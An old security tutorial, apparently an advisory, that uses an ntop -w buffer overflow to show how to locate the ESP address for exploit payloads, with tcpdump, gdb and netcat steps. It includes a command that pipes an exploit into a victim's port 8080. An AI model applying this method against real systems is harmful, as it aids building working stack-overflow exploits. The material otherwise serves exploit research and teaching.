NTop -w vulnerability as an example for finding ESPs
27 Oct. 2000
Summary
A lot of security vulnerabilities and exploits require the attacker or the administrator using the exploit code to supply an ESP address (Extended Stack Pointer). ESP will be used as the payload area, since this is where the return pointer will point. Once this is provided the exploit will overflow the buffer, overwrite the return address to the given ESP address, causing the program to jump to the ESP area where an arbitrary set of commands can be found.
Since ESP isn't exactly at the same place on all versions (all compiled versions, UNIX flavors, etc), it needs to be calculated for every available version manually (it can be also sometimes guessed, but the below approach is much quicker).
2. [On local host]
Do "tcpdump -w somefile" to get tcpdump file to feed ntop. Copy it to victim host.
3. [On victim host]
Execute following with our modified ntop
$ ./ntop -w 8080 -f somefile
---- The following will be shown ----
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
----
4. [On victim host]
Run gdb to attach our ntop process, and break at function returnHTTPPage.
$ gdb ./ntop 2634
(gdb) break returnHTTPPage
Breakpoint 1 at 0x8051350
(gdb) cont
Continuing.
[Switching to Thread 28851]
5. [On local host]
Execute exploit to victim host
$ ./ntop-w-exp | nc victim 8080
6. [On victim host]
Gdb will stop at breakpoint returnHTTPPage.
Then you set break point on function strcpy, and then continue, and then gdb will stop at strcpy breakpoint. The value of "dest=0xbefffb00" is the location of stack we will use as ESP value.
---- The following will be shown ----
Breakpoint 1, 0x8051350 in returnHTTPPage ()
(gdb) break strcpy
Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
(gdb) cont
Continuing.
